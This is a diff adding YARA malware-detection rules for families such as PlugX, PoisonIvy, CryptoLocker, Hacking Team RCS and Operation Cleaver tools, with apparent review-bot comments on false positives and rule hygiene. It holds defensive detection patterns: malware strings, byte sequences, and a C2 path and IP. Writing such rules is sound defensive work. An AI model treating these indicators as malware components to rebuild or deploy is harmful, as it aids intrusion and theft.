+rule Olyx : Family
+{
+    meta:
+        description = "Olyx"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    condition:
+        OlyxCode or OlyxStrings
+}
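Review bot: The two OlyxCode patterns store repeated 0x36 and 0x5C bytes into consecutive dwords (`mov [eax+4], 36363636h; mov [eax+8], 36363636h` and the 5C variant), which are the HMAC ipad/opad padding constants; any statically linked HMAC implementation may contain this exact sequence, and with `any of them` a single pattern fires and `Olyx` escalates it to a family hit. If these rules scan files, consider `all of them and (uint32(0) == 0xFEEDFACE or uint32(0) == 0xFEEDFACF)` to at least restrict the code rule to Mach-O, or gate the aggregate on OlyxStrings. Add a comment naming the constants (`// HMAC ipad 0x36 / opad 0x5C`) so the weakness is visible.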
diff --git a/malware/Opcleaver.yar b/malware/Opcleaver.yar
new file mode 100644
index 0000000..7281789
--- /dev/null
+++ b/malware/Opcleaver.yar
@@ -0,0 +1,335 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule OPCLEAVER_BackDoorLogger
+{
+	meta:
+		description = "Keylogger used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "BackDoorLogger"
+		$s2 = "zhuAddress"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_Jasus
+{
+	meta:
+		description = "ARP cache poisoner used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "pcap_dump_open"
+		$s2 = "Resolving IPs to poison..."
+		$s3 = "WARNNING: Gateway IP can not be found"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_LoggerModule
+{
+	meta:
+		description = "Keylogger used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "%s-%02d%02d%02d%02d%02d.r"
+		$s2 = "C:\\Users\\%s\\AppData\\Cookies\\"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_NetC
+{
+	meta:
+		description = "Net Crawler used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "NetC.exe" wide
+		$s2 = "Net Service"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_ShellCreator2
+{
+	meta:
+		description = "Shell Creator used by attackers in Operation Cleaver to create ASPX web shells"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "ShellCreator2.Properties"
+		$s2 = "set_IV"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_SmartCopy2
+{
+	meta:
+		description = "Malware or hack tool used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "SmartCopy2.Properties"
+		$s2 = "ZhuFrameWork"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_SynFlooder
+{
+	meta:
+		description = "Malware or hack tool used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "Unable to resolve [ %s ]. ErrorCode %d"
+		$s2 = "your target’s IP is : %s"
+		$s3 = "Raw TCP Socket Created successfully."
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_TinyZBot
+{
+	meta:
+		description = "Tiny Bot used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "NetScp" wide
+		$s2 = "TinyZBot.Properties.Resources.resources"
+		$s3 = "Aoao WaterMark"
+		$s4 = "Run_a_exe"
+		$s5 = "netscp.exe"
+		$s6 = "get_MainModule_WebReference_DefaultWS"
+		$s7 = "remove_CheckFileMD5Completed"
+		$s8 = "http://tempuri.org/"
+		$s9 = "Zhoupin_Cleaver"
+	condition:
+		(($s1 and $s2) or ($s3 and $s4 and $s5) or ($s6 and $s7 and $s8) or $s9)
+}
+
+rule OPCLEAVER_ZhoupinExploitCrew
+{
+	meta:
+		description = "Keywords used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "zhoupin exploit crew" nocase
+		$s2 = "zhopin exploit crew" nocase
+	condition:
+		1 of them
+}
+
+rule OPCLEAVER_antivirusdetector
+{
+	meta:
+		description = "Hack tool used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "getShadyProcess"
+		$s2 = "getSystemAntiviruses"
+		$s3 = "AntiVirusDetector"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_csext
+{
+	meta:
+		description = "Backdoor used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "COM+ System Extentions"
+		$s2 = "csext.exe"
+		$s3 = "COM_Extentions_bin"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_kagent
+{
+	meta:
+		description = "Backdoor used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "kill command is in last machine, going back"
+		$s2 = "message data length in B64: %d Bytes"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_mimikatzWrapper
+{
+	meta:
+		description = "Mimikatz Wrapper used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "mimikatzWrapper"
+		$s2 = "get_mimikatz"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_pvz_in
+{
+	meta:
+		description = "Parviz tool used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "LAST_TIME=00/00/0000:00:00PM$"
+		$s2 = "if %%ERRORLEVEL%% == 1 GOTO line"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_pvz_out
+{
+	meta:
+		description = "Parviz tool used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "Network Connectivity Module" wide
+		$s2 = "OSPPSVC" wide
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_wndTest
+{
+	meta:
+		description = "Backdoor used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "[Alt]" wide
+		$s2 = "<< %s >>:" wide
+		$s3 = "Content-Disposition: inline; comp=%s; account=%s; product=%d;"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_zhCat
+{
+	meta:
+		description = "Network tool used by Iranian hackers and used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "Mozilla/4.0 ( compatible; MSIE 7.0; AOL 8.0 )" ascii fullword
+		$s2 = "ABC ( A Big Company )" wide fullword
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_zhLookUp
+{
+	meta:
+		description = "Hack tool used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "zhLookUp.Properties"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_zhmimikatz
+{
+	meta:
+		description = "Mimikatz wrapper used by attackers in Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Cylance Inc."
+		score = "70"
+	strings:
+		$s1 = "MimikatzRunner"
+		$s2 = "zhmimikatz"
+	condition:
+		all of them
+}
+
+rule OPCLEAVER_Parviz_Developer
+{
+	meta:
+		description = "Parviz developer known from Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Florian Roth"
+		score = "70"
+	strings:
+		$s1 = "Users\\parviz\\documents\\" nocase
+	condition:
+		$s1 
+}
+
+rule OPCLEAVER_CCProxy_Config
+{
+	meta:
+		description = "CCProxy config known from Operation Cleaver"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		date = "2014/12/02"
+		author = "Florian Roth"
+		score = "70"
+	strings:
+		$s1 = "UserName=User-001" fullword ascii
+		$s2 = "Web=1" fullword ascii
+		$s3 = "Mail=1" fullword ascii
+		$s4 = "FTP=0" fullword ascii
+		$x1 = "IPAddressLow=78.109.194.114" fullword ascii
+	condition:
+		all of ($s*) or $x1 
+}
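Review bot: In OPCLEAVER_SynFlooder, `$s2 = "your target’s IP is : %s"` contains a Unicode right single quotation mark (U+2019) rather than an ASCII apostrophe, which looks like a word-processor smart-quote substitution; if the binary uses a plain `'`, the string never matches and, because the condition is `all of them`, the whole rule is dead. Verify the byte in the sample and, if it is ASCII, change the line to `$s2 = "your target's IP is : %s"`. Several rules here also AND a family-specific string with a generic one (`[Alt]` and `<< %s >>:` in wndTest, `http://tempuri.org/` in TinyZBot); that is acceptable, but a comment marking which string carries the signal would help triage.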
diff --git a/malware/PlugX.yar b/malware/PlugX.yar
new file mode 100644
index 0000000..33da0ae
--- /dev/null
+++ b/malware/PlugX.yar
@@ -0,0 +1,47 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule PlugXStrings : PlugX Family
+{
+    meta:
+        description = "PlugX Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-12"
+        
+    strings:
+        $BootLDR = "boot.ldr" wide ascii
+        $Dwork = "d:\\work" nocase
+        $Plug25 = "plug2.5"
+        $Plug30 = "Plug3.0"
+        $Shell6 = "Shell6"
+      
+    condition:
+        $BootLDR or ($Dwork and ($Plug25 or $Plug30 or $Shell6))
+}
+
+rule plugX : rat
+{
+	meta:
+		author = "Jean-Philippe Teissier / @Jipe_"
+		description = "PlugX RAT"
+		date = "2014-05-13"
+		filetype = "memory"
+		version = "1.0" 
+		ref1 = "https://github.com/mattulm/IR-things/blob/master/volplugs/plugx.py"
+		
+	strings:
+		$v1a = { 47 55 4C 50 00 00 00 00 }
+		$v1b = "/update?id=%8.8x" 
+		$v1algoa = { BB 33 33 33 33 2B } 
+		$v1algob = { BB 44 44 44 44 2B } 
+		$v2a = "Proxy-Auth:" 
+		$v2b = { 68 A0 02 00 00 } 
+		$v2k = { C1 8F 3A 71 } 
+		
+	condition: 
+		$v1a at 0 or $v1b or (($v2a or $v2b) and (($v1algoa and $v1algob) or $v2k))
+}
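Review bot: The hex patterns in `plugX` carry no disassembly comments, unlike the other code-feature rules in this ruleset, so a reader cannot tell what `$v1algoa`/`$v1algob` (`BB 33 33 33 33 2B` / `BB 44 44 44 44 2B`, i.e. `mov ebx, 33333333h` / `44444444h` followed by a `sub` opcode) or `$v2b` (`68 A0 02 00 00`, `push 2A0h`) are meant to pin down, or why the four bytes in `$v2k` are treated as a key (presumably a fragment of the config/traffic key — confirm). Please add one-line comments per pattern, e.g. `$v2b = { 68 A0 02 00 00 } // push 0x2A0`. It is worth stating explicitly that `$v2b` is a generic five-byte push and is only meaningful inside the AND terms of the condition.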
diff --git a/malware/PoisonIvy.yar b/malware/PoisonIvy.yar
new file mode 100644
index 0000000..0c2b7f8
--- /dev/null
+++ b/malware/PoisonIvy.yar
@@ -0,0 +1,24 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule poisonivy : rat
+{
+	meta:
+		description = "Poison Ivy"
+		author = "Jean-Philippe Teissier / @Jipe_"
+		date = "2013-02-01"
+		filetype = "memory"
+		version = "1.0" 
+		ref1 = "https://code.google.com/p/volatility/source/browse/trunk/contrib/plugins/malware/poisonivy.py"
+
+	strings:
+		$a = { 53 74 75 62 50 61 74 68 ?? 53 4F 46 54 57 41 52 45 5C 43 6C 61 73 73 65 73 5C 68 74 74 70 5C 73 68 65 6C 6C 5C 6F 70 65 6E 5C 63 6F 6D 6D 61 6E 64 [22] 53 6F 66 74 77 61 72 65 5C 4D 69 63 72 6F 73 6F 66 74 5C 41 63 74 69 76 65 20 53 65 74 75 70 5C 49 6E 73 74 61 6C 6C 65 64 20 43 6F 6D 70 6F 6E 65 6E 74 73 5C } 
+		
+	condition:
+		$a
+}
+
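Review bot: `$a` in poisonivy requires exactly 22 bytes (`[22]`) between `...\shell\open\command` and `Software\Microsoft\Active Setup\...`, and exactly one byte (`??`) after `StubPath`; any build that pads or orders its unpacked config differently is missed, and with `filetype = "memory"` that layout is whatever the builder version produced. If the spacing is not known to be fixed across versions, a bounded jump such as `[16-64]` would be safer. Please also add a comment decoding the hex (`StubPath`, `SOFTWARE\Classes\http\shell\open\command`, `Software\Microsoft\Active Setup\Installed Components\`) so the next maintainer does not have to reverse the byte string, and state that a file scan of a packed sample is not expected to hit.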
diff --git a/malware/PubSab.yar b/malware/PubSab.yar
new file mode 100644
index 0000000..3d03254
--- /dev/null
+++ b/malware/PubSab.yar
@@ -0,0 +1,47 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule PubSabCode : PubSab Family 
+{
+    meta:
+        description = "PubSab code tricks"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    strings:
+        $decrypt = { 6B 45 E4 37 89 CA 29 C2 89 55 E4 }
+        
+    condition:
+        any of them
+}
+
+rule PubSabStrings : PubSab Family
+{
+    meta:
+        description = "PubSab Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    strings:
+        $ = "_deamon_init"
+        $ = "com.apple.PubSabAgent"
+        $ = "/tmp/screen.jpeg"
+       
+    condition:
+        any of them
+}
+
+rule PubSab : Family
+{
+    meta:
+        description = "PubSab"
+        author = "Seth Hardy"
+        last_modified = "2014-06-19"
+        
+    condition:
+        PubSabCode or PubSabStrings
+}
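Review bot: `$ = "_deamon_init"` in PubSabStrings is spelled with the `deamon` transposition; if that is the exact symbol in the sample it should say so, because under `any of them` a silently "corrected" string just stops matching with no signal. Suggest `$ = "_deamon_init" // sic: misspelling as in the binary` (or fix it if the sample actually exports `_daemon_init`). `/tmp/screen.jpeg` on its own is a plausible path in benign macOS tooling; `fullword` or pairing it with a second string would tighten the rule. The `$decrypt` pattern could use the same disassembly comment style as the other code rules (`imul eax, [ebp-1Ch], 37h; mov edx, ecx; sub edx, eax; mov [ebp-1Ch], edx`).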
diff --git a/malware/Quarian.yar b/malware/Quarian.yar
new file mode 100644
index 0000000..6116214
--- /dev/null
+++ b/malware/Quarian.yar
@@ -0,0 +1,75 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule QuarianStrings : Quarian Family
+{
+    meta:
+        description = "Quarian Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-07-09"
+        
+    strings:
+        $ = "s061779s061750"
+        $ = "[OnUpLoadFile]"
+        $ = "[OnDownLoadFile]"
+        $ = "[FileTransfer]"
+        $ = "---- Not connect the Manager, so start UnInstall ----"
+        $ = "------- Enter CompressDownLoadDir ---------"
+        $ = "------- Enter DownLoadDirectory ---------"
+        $ = "[HandleAdditionalData]"
+        $ = "[mswsocket.dll]"
+        $ = "msupdate.dll........Enter ThreadCmd!"
+        $ = "ok1-1"
+        $ = "msupdate_tmp.dll"
+        $ = "replace Rpcss.dll successfully!"
+        $ = "f:\\loadhiddendriver-mdl\\objfre_win7_x86\\i386\\intelnat.pdb"
+        $ = "\\drivercashe\\" wide ascii
+        $ = "\\microsoft\\windwos\\" wide ascii
+        $ = "\\DosDevices\\LOADHIDDENDRIVER" wide ascii
+        $ = "\\Device\\LOADHIDDENDRIVER" wide ascii
+        $ = "Global\\state_maping" wide ascii
+        $ = "E:\\Code\\2.0\\2.0_multi-port\\2.0\\ServerInstall_New-2010-0913_sp3\\msupdataDll\\Release\\msupdate_tmp.pdb"
+        $ = "Global\\unInstall_event_1554_Ower" wide ascii
+        
+    condition:
+       any of them
+}
+
+rule QuarianCode : Quarian Family 
+{
+    meta:
+        description = "Quarian code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-09"
+    
+    strings:
+        // decrypt in intelnat.sys
+        $ = { C1 E? 04 8B ?? F? C1 E? 05 33 C? }
+        // decrypt in mswsocket.dll
+        $ = { C1 EF 05 C1 E3 04 33 FB }
+        $ = { 33 D8 81 EE 47 86 C8 61 }
+        // loop in msupdate.dll
+        $ = { FF 45 E8 81 45 EC CC 00 00 00 E9 95 FE FF FF }
+    
+    condition:
+        any of them
+}
+
+rule Quarian : Family
+{
+    meta:
+        description = "Quarian"
+        author = "Seth Hardy"
+        last_modified = "2014-07-09"
+        
+    condition:
+        QuarianCode or QuarianStrings
+}
+
+
+
+
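Review bot: QuarianStrings fires on `any of them`, and the list includes `$ = "ok1-1"`, a five-character token that will appear by chance in benign data (logs, version strings, hex dumps), so the aggregate `Quarian` rule effectively becomes a match on `ok1-1`. Either drop that string, or make it `fullword` and require company for it, e.g. name the PDB paths, mutex and driver names `$strong*` and use `condition: 1 of ($strong*) or 2 of them`. The bracketed log tags (`[FileTransfer]`, `[OnUpLoadFile]`, `[OnDownLoadFile]`, `[HandleAdditionalData]`) are weaker than they look for the same reason; the PDB paths, `LOADHIDDENDRIVER` device names and `unInstall_event_1554_Ower` mutex are the strings that actually carry family signal.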
diff --git a/malware/RAT_Terminator.yar b/malware/RAT_Terminator.yar
new file mode 100644
index 0000000..417cd42
--- /dev/null
+++ b/malware/RAT_Terminator.yar
@@ -0,0 +1,40 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule TerminatorRat : rat 
+{
+	meta:
+		description = "Terminator RAT" 
+		author = "Jean-Philippe Teissier / @Jipe_"
+		date = "2013-10-24"
+		filetype = "memory"
+		version = "1.0" 
+		ref1 = "http://www.fireeye.com/blog/technical/malware-research/2013/10/evasive-tactics-terminator-rat.html" 
+
+	strings:
+		$a = "Accelorator"
+		$b = "<html><title>12356</title><body>"
+
+	condition:
+		all of them
+}
+
+
+
+rule TROJAN_Notepad_shell_crew {
+        meta:
+                author = "RSA_IR"
+                Date     = "4Jun13"
+                File     = "notepad.exe v 1.1"
+                MD5      = "106E63DBDA3A76BEEB53A8BBD8F98927"
+        strings:
+                $s1 = "75BAA77C842BE168B0F66C42C7885997"
+                $s2 = "B523F63566F407F3834BCC54AAA32524"
+        condition:
+                $s1 or $s2
+}
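Review bot: `TROJAN_Notepad_shell_crew` at the bottom of this file is an exact duplicate of `TROJAN_Notepad` in Notepad.yar (same two strings, same meta) and has nothing to do with Terminator RAT; compiling the full set yields two alerts for every hit. Remove it from here (or from Notepad.yar) so each indicator lives in one place. Its meta keys (`Author`, `Date`, `File`, `MD5`) are also capitalised, unlike the lower-case `author`/`date` used everywhere else in the ruleset, which matters for anyone filtering on meta programmatically.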
diff --git a/malware/RCS.yar b/malware/RCS.yar
new file mode 100644
index 0000000..666f46b
--- /dev/null
+++ b/malware/RCS.yar
@@ -0,0 +1,73 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule RCS_Backdoor
+{
+    meta:
+        description = "Hacking Team RCS Backdoor"
+	author = "botherder https://github.com/botherder"
+
+    strings:
+        $filter1 = "$debug3"
+        $filter2 = "$log2"
+        $filter3 = "error2"
+
+        $debug1 = /\- (C)hecking components/ wide ascii
+        $debug2 = /\- (A)ctivating hiding system/ wide ascii
+        $debug3 = /(f)ully operational/ wide ascii
+
+        $log1 = /\- Browser activity \(FF\)/ wide ascii
+        $log2 = /\- Browser activity \(IE\)/ wide ascii
+        
+        // Cause false positives.
+        //$log3 = /\- About to call init routine at %p/ wide ascii
+        //$log4 = /\- Calling init routine at %p/ wide ascii
+
+        $error1 = /\[Unable to deploy\]/ wide ascii
+        $error2 = /\[The system is already monitored\]/ wide ascii
+
+    condition:
+        (2 of ($debug*) or 2 of ($log*) or all of ($error*)) and not any of ($filter*)
+}
+
+rule RCS_Scout
+{
+    meta:
+        description = "Hacking Team RCS Scout"
+	author = "botherder https://github.com/botherder"
+
+    strings:
+        $filter1 = "$engine5"
+        $filter2 = "$start4"
+        $filter3 = "$upd2"
+        $filter4 = "$lookma6"
+
+        $engine1 = /(E)ngine started/ wide ascii
+        $engine2 = /(R)unning in background/ wide ascii
+        $engine3 = /(L)ocking doors/ wide ascii
+        $engine4 = /(R)otors engaged/ wide ascii
+        $engine5 = /(I)\'m going to start it/ wide ascii
+
+        $start1 = /Starting upgrade\!/ wide ascii
+        $start2 = /(I)\'m going to start the program/ wide ascii
+        $start3 = /(i)s it ok\?/ wide ascii
+        $start4 = /(C)lick to start the program/ wide ascii
+
+        $upd1 = /(U)pdJob/ wide ascii
+        $upd2 = /(U)pdTimer/ wide ascii
+
+        $lookma1 = /(O)wning PCI bus/ wide
+        $lookma2 = /(F)ormatting bios/ wide
+        $lookma3 = /(P)lease insert a disk in drive A:/ wide
+        $lookma4 = /(U)pdating CPU microcode/ wide
+        $lookma5 = /(N)ot sure what's happening/ wide
+        $lookma6 = /(L)ook ma, no thread id\! \\\\o\// wide        
+
+    condition:
+        (all of ($engine*) or all of ($start*) or all of ($upd*) or 4 of ($lookma*)) and not any of ($filter*)
+}
+
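Review bot: In `$lookma6 = /(L)ook ma, no thread id\! \\\\o\// wide`, a YARA regex `\\\\` matches two literal backslashes, so the pattern matches `\\o/` rather than the `\o/` emoticon; if the binary's string is `\o/` (what a C literal `"\\o/"` compiles to), the line should read `/(L)ook ma, no thread id\! \\o\// wide`. Because only four of six `$lookma*` strings are required the rule still works, but a dead string is misleading, so confirm against the sample. The `$filter*` mechanism (suppressing hits on files that contain the rule's own variable names, i.e. this file) is undocumented; a one-line comment such as `// $filter*: keep the rule from matching its own source` would save the next reader some puzzling.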
diff --git a/malware/Ramsonware.yar b/malware/Ramsonware.yar
new file mode 100644
index 0000000..e6f403d
--- /dev/null
+++ b/malware/Ramsonware.yar
@@ -0,0 +1,65 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule CryptoLocker_set1
+{
+meta:
+	author = "Christiaan Beek, Christiaan_Beek@McAfee.com"
+	date = "2014-04-13"
+	description = "Detection of Cryptolocker Samples"
+	
+strings:
+	$string0 = "static"
+	$string1 = " kscdS"
+	$string2 = "Romantic"
+	$string3 = "CompanyName" wide
+	$string4 = "ProductVersion" wide
+	$string5 = "9%9R9f9q9"
+	$string6 = "IDR_VERSION1" wide
+	$string7 = "  </trustInfo>"
+	$string8 = "LookFor" wide
+	$string9 = ":n;t;y;"
+	$string10 = "        <requestedExecutionLevel level"
+	$string11 = "VS_VERSION_INFO" wide
+	$string12 = "2.0.1.0" wide
+	$string13 = "<assembly xmlns"
+	$string14 = "  <trustInfo xmlns"
+	$string15 = "srtWd@@"
+	$string16 = "515]5z5"
+	$string17 = "C:\\lZbvnoVe.exe" wide
+condition:
+	8 of ($string*)
+}
+
+rule CryptoLocker_rule2
+{
+meta:
+	author = "Christiaan Beek, Christiaan_Beek@McAfee.com"
+	date = "2014-04-14"
+	description = "Detection of CryptoLocker Variants"
+strings:
+	$string0 = "2.0.1.7" wide
+	$string1 = "    <security>"
+	$string2 = "Romantic"
+	$string3 = "ProductVersion" wide
+	$string4 = "9%9R9f9q9"
+	$string5 = "IDR_VERSION1" wide
+	$string6 = "button"
+	$string7 = "    </security>"
+	$string8 = "VFileInfo" wide
+	$string9 = "LookFor" wide
+	$string10 = "      </requestedPrivileges>"
+	$string11 = " uiAccess"
+	$string12 = "  <trustInfo xmlns"
+	$string13 = "last.inf"
+	$string14 = " manifestVersion"
+	$string15 = "FFFF04E3" wide
+	$string16 = "3,31363H3P3m3u3z3"
+condition:
+	8 of ($string*)
+}
+
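Review bot: CryptoLocker_set1's threshold `8 of ($string*)` is reachable with generic resource and manifest strings alone — `CompanyName`, `ProductVersion`, `IDR_VERSION1`, `</trustInfo>`, `<requestedExecutionLevel level`, `VS_VERSION_INFO`, `<assembly xmlns`, `<trustInfo xmlns` are eight strings present in a large share of manifest-bearing Windows executables — so the rule will flag benign binaries, and CryptoLocker_rule2 has the same shape. Anchor each rule on its sample-specific artifacts, e.g. `condition: 8 of ($string*) and ($string17 or $string15 or $string1)` for set1 (the `C:\\lZbvnoVe.exe` path, `srtWd@@`, ` kscdS`) and `8 of ($string*) and ($string13 or $string15 or $string16)` for rule2. The file name `Ramsonware.yar` is also misspelled; `Ransomware.yar` would be easier to find.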
diff --git a/malware/Regsubdat.yar b/malware/Regsubdat.yar
new file mode 100644
index 0000000..0a33d15
--- /dev/null
+++ b/malware/Regsubdat.yar
@@ -0,0 +1,54 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule RegSubDatCode : RegSubDat Family 
+{
+    meta:
+        description = "RegSubDat code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-14"
+    
+    strings:
+        // decryption loop
+        $ = { 80 34 3? 99 40 (3D FB 65 00 00 | 3B C6) 7? F? }
+        // push then pop values
+        $ = { 68 FF FF 7F 00 5? }
+        $ = { 68 FF 7F 00 00 5? }
+    
+    condition:
+        all of them
+}
+
+rule RegSubDatStrings : RegSubDat Family
+{
+    meta:
+        description = "RegSubDat Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-07-14"
+        
+    strings:
+        $avg1 = "Button"
+        $avg2 = "Allow"
+        $avg3 = "Identity Protection"
+        $avg4 = "Allow for all"
+        $avg5 = "AVG Firewall Asks For Confirmation"
+        $mutex = "0x1A7B4C9F"
+        
+    condition:
+       all of ($avg*) or $mutex
+}
+
+rule RegSubDat : Family
+{
+    meta:
+        description = "RegSubDat"
+        author = "Seth Hardy"
+        last_modified = "2014-07-14"
+        
+    condition:
+        RegSubDatCode or RegSubDatStrings
+}
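Review bot: The component rules `RegSubDatCode` and `RegSubDatStrings` exist only to feed `RegSubDat`, yet they are public, so a single hit is reported up to three times under three names. If one verdict per family is the intent, declare them `private rule RegSubDatCode : RegSubDat Family` and `private rule RegSubDatStrings : RegSubDat Family` so only `RegSubDat` surfaces; the composite condition keeps working because private rules can still be referenced. The same Code/Strings/Family layout recurs in the other Seth Hardy files in this commit, so whichever choice is made should be applied consistently.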
diff --git a/malware/Rooter.yar b/malware/Rooter.yar
new file mode 100644
index 0000000..51d63e7
--- /dev/null
+++ b/malware/Rooter.yar
@@ -0,0 +1,81 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule RooterCode : Rooter Family 
+{
+    meta:
+        description = "Rooter code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-10"
+    
+    strings:
+        // xor 0x30 decryption
+        $ = { 80 B0 ?? ?? ?? ?? 30 40 3D 00 50 00 00 7C F1 }
+    
+    condition:
+        any of them
+}
+
+rule RooterStrings : Rooter Family
+{
+    meta:
+        description = "Rooter Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-07-10"
+        
+    strings:
+        $group1 = "seed\x00"
+        $group2 = "prot\x00"
+        $group3 = "ownin\x00"
+        $group4 = "feed0\x00"
+        $group5 = "nown\x00"
+
+    condition:
+       3 of ($group*)
+}
+
+
